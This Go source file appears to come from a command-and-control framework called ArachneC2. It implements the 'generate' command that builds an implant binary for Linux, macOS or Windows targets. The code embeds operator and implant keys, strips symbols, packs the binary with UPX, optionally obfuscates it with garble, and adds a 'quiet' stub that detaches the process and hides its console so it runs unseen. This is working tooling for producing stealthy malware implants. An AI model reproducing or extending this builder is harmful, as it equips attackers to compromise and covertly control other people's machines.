package core

import (
	"archive/tar"
	"bytes"
	"compress/gzip"
	"crypto/rand"
	"flag"
	"fmt"
	"io"
	"log"
	"net/http"
	"os"
	"os/exec"
	"path/filepath"
	"runtime"
	"strings"

	"github.com/libp2p/go-libp2p/core/crypto"
	"github.com/libp2p/go-libp2p/core/peer"

	"github.com/portbuster1337/ArachneC2/server/core/embedsrc"
)

type GenerateConfig struct {
	PubKeyPath string
	OutputPath string
	TargetOS   string
	TargetArch string
	UseUPX     bool
	Obfuscate  bool
	Quiet      bool
}

func RunGenerate(args []string) error {
	cfg := GenerateConfig{
		PubKeyPath: defaultPubKeyPath(),
		OutputPath: "implant",
		TargetOS:   "linux",
		TargetArch: "amd64",
	}

	fs := flag.NewFlagSet("generate", flag.ExitOnError)
	fs.StringVar(&cfg.PubKeyPath, "pubkey", cfg.PubKeyPath, "path to operator public key")
	fs.StringVar(&cfg.OutputPath, "output", cfg.OutputPath, "output path for the implant binary")
	fs.StringVar(&cfg.TargetOS, "os", cfg.TargetOS, "target OS (linux, darwin, windows)")
	fs.StringVar(&cfg.TargetArch, "arch", cfg.TargetArch, "target architecture (amd64, arm64)")
	fs.BoolVar(&cfg.UseUPX, "upx", true, "compress with UPX")
	fs.BoolVar(&cfg.Obfuscate, "obfuscate", false, "obfuscate the implant with garble (auto-installs if missing)")
	fs.BoolVar(&cfg.Quiet, "quiet", false, "suppress output and run in background (no console on Windows)")
	fs.Parse(args)

	return BuildImplant(cfg)
}

func BuildImplant(cfg GenerateConfig) error {
	pubData, err := os.ReadFile(cfg.PubKeyPath)
	if err != nil {
		return fmt.Errorf("read pubkey %s: %w", cfg.PubKeyPath, err)
	}

	implantPriv, implantPub, err := crypto.GenerateEd25519Key(rand.Reader)
	if err != nil {
		return fmt.Errorf("generate implant key: %w", err)
	}
	privBytes, err := crypto.MarshalPrivateKey(implantPriv)
	if err != nil {
		return fmt.Errorf("marshal implant private key: %w", err)
	}
	implantPeerID, _ := peer.IDFromPublicKey(implantPub)
	log.Printf("implant PeerID: %s", implantPeerID.String())

	buildDir, err := prepareBuildDir(pubData, privBytes, cfg.Quiet)
	if err != nil {
		return fmt.Errorf("prepare build directory: %w", err)
	}
	defer os.RemoveAll(buildDir)

	outPath := cfg.OutputPath
	if !filepath.IsAbs(outPath) {
		wd, _ := os.Getwd()
		outPath = filepath.Join(wd, outPath)
	}

	_, err = ensureGo()
	if err != nil {
		return fmt.Errorf("go not available: %w", err)
	}

	goBin := findGo()

	ldflags := "-s -w -buildid="
	if cfg.Quiet && cfg.TargetOS == "windows" {
		ldflags += " -H=windowsgui"
	}

	var builder string
	var buildArgs []string
	if cfg.Obfuscate {
		garble, err := ensureGarble(goBin)
		if err != nil {
			return fmt.Errorf("garble not available: %w", err)
		}
		builder = garble
		buildArgs = []string{"-literals", "-tiny", "build", "-trimpath", "-buildvcs=false", "-o", outPath, "-ldflags=" + ldflags, "./implant/"}
		log.Printf("obfuscating with garble")
	} else {
		builder = goBin
		buildArgs = []string{"build", "-trimpath", "-buildvcs=false", "-o", outPath, "-ldflags=" + ldflags, "./implant/"}
	}

	cmd := exec.Command(builder, buildArgs...)
	path := os.Getenv("PATH")
	goDir := filepath.Dir(goBin)
	if !strings.Contains(path, goDir) {
		path = goDir + ":" + path
	}
	cmd.Env = append(os.Environ(),
		"GOOS="+cfg.TargetOS,
		"GOARCH="+cfg.TargetArch,
		"CGO_ENABLED=0",
		"PATH="+path,
	)
	cmd.Stdout = os.Stdout
	cmd.Stderr = os.Stderr
	cmd.Dir = buildDir

	log.Printf("building implant for %s/%s -> %s", cfg.TargetOS, cfg.TargetArch, outPath)
	if err := cmd.Run(); err != nil {
		return fmt.Errorf("build: %w", err)
	}
	log.Printf("built %s", outPath)

	// Best-effort strip for Linux/macOS to remove any remaining symbol tables
	if cfg.TargetOS == "linux" || cfg.TargetOS == "darwin" {
		stripCmd := exec.Command("strip", "-s", outPath)
		_ = stripCmd.Run()
	}

	if cfg.UseUPX {
		if upxPath, err := exec.LookPath("upx"); err == nil {
			upx := exec.Command(upxPath, "--lzma", "--compress-exports=0", outPath)
			upx.Stdout = os.Stdout
			upx.Stderr = os.Stderr
			if err := upx.Run(); err != nil {
				log.Printf("upx compression skipped: %v", err)
			}
		} else {
			log.Printf("upx not found, skipping compression")
		}
	}

	return nil
}

func prepareBuildDir(pubKeyData, privKeyData []byte, quiet bool) (string, error) {
	dir, err := os.MkdirTemp("", "arachne-build-*")
	if err != nil {
		return "", fmt.Errorf("create temp dir: %w", err)
	}

	pubLiteral := bytesLiteral(pubKeyData)
	privLiteral := bytesLiteral(privKeyData)
	pubContent := fmt.Sprintf(`// Code generated by arachne generate. DO NOT EDIT.
package core

var embeddedOperatorPubKey = %s
`, pubLiteral)
	keyContent := fmt.Sprintf(`// Code generated by arachne generate. DO NOT EDIT.
package core

var embeddedImplantPrivKey = %s
`, privLiteral)

	if err := extractEmbeddedSource(dir); err != nil {
		return "", err
	}

	// Rename go.mod.txt/go.sum.txt back to real names
	os.Rename(filepath.Join(dir, "go.mod.txt"), filepath.Join(dir, "go.mod"))
	os.Rename(filepath.Join(dir, "go.sum.txt"), filepath.Join(dir, "go.sum"))

	coreDir := filepath.Join(dir, "implant", "core")
	if err := os.WriteFile(filepath.Join(coreDir, "embedded_pubkey.go"), []byte(pubContent), 0644); err != nil {
		return "", fmt.Errorf("write embedded_pubkey.go: %w", err)
	}
	if err := os.WriteFile(filepath.Join(coreDir, "embedded_implant_key.go"), []byte(keyContent), 0644); err != nil {
		return "", fmt.Errorf("write embedded_implant_key.go: %w", err)
	}

	if quiet {
		if err := writeQuietStub(coreDir); err != nil {
			return "", fmt.Errorf("write quiet stub: %w", err)
		}
	}

	return dir, nil
}

func writeQuietStub(coreDir string) error {
	quietContent := `//go:build !windows

package core

import (
	"os"
	"syscall"
)

func init() {
	if os.Getenv("_ARACHNE_DAEMON") == "1" {
		return
	}

	f, err := os.OpenFile("/dev/null", os.O_RDWR, 0)
	if err != nil {
		os.Exit(1)
	}

	attr := &os.ProcAttr{
		Files: []*os.File{f, f, f},
		Env:   append(os.Environ(), "_ARACHNE_DAEMON=1"),
		Sys:   &syscall.SysProcAttr{Setsid: true},
	}

	proc, err := os.StartProcess(os.Args[0], os.Args, attr)
	if err != nil {
		os.Exit(1)
	}
	proc.Release()
	os.Exit(0)
}
`
	return os.WriteFile(filepath.Join(coreDir, "quiet.go"), []byte(quietContent), 0644)
}

func extractEmbeddedSource(dst string) error {
	gz, err := gzip.NewReader(bytes.NewReader(embedsrc.ImplantSourceArchive))
	if err != nil {
		return fmt.Errorf("gzip reader: %w", err)
	}
	defer gz.Close()

	tr := tar.NewReader(gz)
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			break
		}
		if err != nil {
			return fmt.Errorf("tar next: %w", err)
		}

		target := filepath.Join(dst, hdr.Name)
		switch hdr.Typeflag {
		case tar.TypeDir:
			if err := os.MkdirAll(target, 0755); err != nil {
				return err
			}
		case tar.TypeReg:
			if err := os.MkdirAll(filepath.Dir(target), 0755); err != nil {
				return err
			}
			f, err := os.OpenFile(target, os.O_CREATE|os.O_RDWR, os.FileMode(hdr.Mode))
			if err != nil {
				return err
			}
			if _, err := io.Copy(f, tr); err != nil {
				f.Close()
				return err
			}
			f.Close()
		}
	}
	return nil
}

func defaultPubKeyPath() string {
	home, err := os.UserHomeDir()
	if err != nil {
		return "operator.pub"
	}
	return filepath.Join(home, ".arachne", "operator.pub")
}

func findProjectRoot() (string, error) {
	dir, err := os.Getwd()
	if err != nil {
		return "", err
	}
	for {
		if fileExists(filepath.Join(dir, "go.mod")) {
			return dir, nil
		}
		parent := filepath.Dir(dir)
		if parent == dir {
			return "", fmt.Errorf("no go.mod found (run from project root)")
		}
		dir = parent
	}
}

func findGo() string {
	if p, err := exec.LookPath("go"); err == nil {
		return p
	}
	if goroot := os.Getenv("GOROOT"); goroot != "" {
		candidate := filepath.Join(goroot, "bin", "go")
		if fileExists(candidate) {
			return candidate
		}
	}
	for _, p := range []string{
		"/usr/local/go/bin/go",
		filepath.Join(os.Getenv("HOME"), ".local", "go", "bin", "go"),
		"/tmp/go/bin/go",
		"/usr/lib/go/bin/go",
	} {
		if fileExists(p) {
			return p
		}
	}
	return "go"
}

func ensureGo() (string, error) {
	if p, err := exec.LookPath("go"); err == nil {
		return p, nil
	}
	if goroot := os.Getenv("GOROOT"); goroot != "" {
		candidate := filepath.Join(goroot, "bin", "go")
		if fileExists(candidate) {
			return candidate, nil
		}
	}
	if fileExists("/usr/local/go/bin/go") {
		return "/usr/local/go/bin/go", nil
	}

	log.Print("Go not found. Attempting to install...")

	osName := runtime.GOOS
	archName := runtime.GOARCH
	switch archName {
	case "x86_64":
		archName = "amd64"
	case "aarch64":
		archName = "arm64"
	}

	resp, err := http.Get("https://go.dev/VERSION?m=text")
	if err != nil {
		return "", fmt.Errorf("check go version: %w", err)
	}
	defer resp.Body.Close()
	versionBytes, err := io.ReadAll(resp.Body)
	if err != nil {
		return "", fmt.Errorf("read go version: %w", err)
	}
	version := strings.TrimSpace(strings.Split(string(versionBytes), "\n")[0])

	url := fmt.Sprintf("https://go.dev/dl/%s.%s-%s.tar.gz", version, osName, archName)
	log.Printf("downloading %s ...", url)

	tarball, err := os.CreateTemp("", "go-*.tar.gz")
	if err != nil {
		return "", fmt.Errorf("create temp file: %w", err)
	}
	defer os.Remove(tarball.Name())

	dlResp, err := http.Get(url)
	if err != nil {
		return "", fmt.Errorf("download go: %w", err)
	}
	defer dlResp.Body.Close()

	if _, err := io.Copy(tarball, dlResp.Body); err != nil {
		return "", fmt.Errorf("write go tarball: %w", err)
	}
	tarball.Close()

	installDir := installGo(tarball.Name())

	log.Printf("Go %s installed at %s", version, installDir)
	return filepath.Join(installDir, "bin", "go"), nil
}

func installGo(tarball string) string {
	extract := func(dst string) error {
		return exec.Command("tar", "-C", dst, "-xzf", tarball).Run()
	}

	// Try direct (running as root or /usr/local writable)
	os.RemoveAll("/usr/local/go")
	if extract("/usr/local") == nil {
		return "/usr/local/go"
	}

	// Try sudo
	if exec.Command("sudo", "rm", "-rf", "/usr/local/go").Run() == nil &&
		exec.Command("sudo", "tar", "-C", "/usr/local", "-xzf", tarball).Run() == nil {
		return "/usr/local/go"
	}

	// Fallback: ~/.local/go
	homeDir, _ := os.UserHomeDir()
	localGo := filepath.Join(homeDir, ".local", "go")
	os.RemoveAll(localGo)
	os.MkdirAll(filepath.Dir(localGo), 0755)
	if extract(filepath.Dir(localGo)) == nil {
		// tar creates a go/ dir in the parent
		if _, err := os.Stat(localGo); err == nil {
			return localGo
		}
	}

	// Last resort: /tmp/go
	os.RemoveAll("/tmp/go")
	extract("/tmp")
	return "/tmp/go"
}

func ensureGarble(goBin string) (string, error) {
	if p, err := exec.LookPath("garble"); err == nil {
		return p, nil
	}
	log.Print("garble not found. Installing via 'go install mvdan.cc/garble@latest'...")
	cmd := exec.Command(goBin, "install", "mvdan.cc/garble@latest")
	cmd.Env = append(os.Environ(), "PATH="+filepath.Dir(goBin)+":"+os.Getenv("PATH"))
	cmd.Stdout = os.Stdout
	cmd.Stderr = os.Stderr
	if err := cmd.Run(); err != nil {
		return "", fmt.Errorf("install garble: %w", err)
	}

	if p, err := exec.LookPath("garble"); err == nil {
		return p, nil
	}

	// go install puts binaries in GOPATH/bin — check there
	gopathOut, _ := exec.Command(goBin, "env", "GOPATH").Output()
	gopath := strings.TrimSpace(string(gopathOut))
	if gopath != "" {
		candidate := filepath.Join(gopath, "bin", "garble")
		if fileExists(candidate) {
			log.Print("garble installed")
			return candidate, nil
		}
	}

	return "", fmt.Errorf("garble installed but not found in PATH or GOPATH/bin")
}

func fileExists(path string) bool {
	_, err := os.Stat(path)
	return err == nil
}

func bytesLiteral(data []byte) string {
	var parts []string
	for _, b := range data {
		parts = append(parts, fmt.Sprintf("%d", b))
	}
	return "[]byte{" + strings.Join(parts, ",") + "}"
}
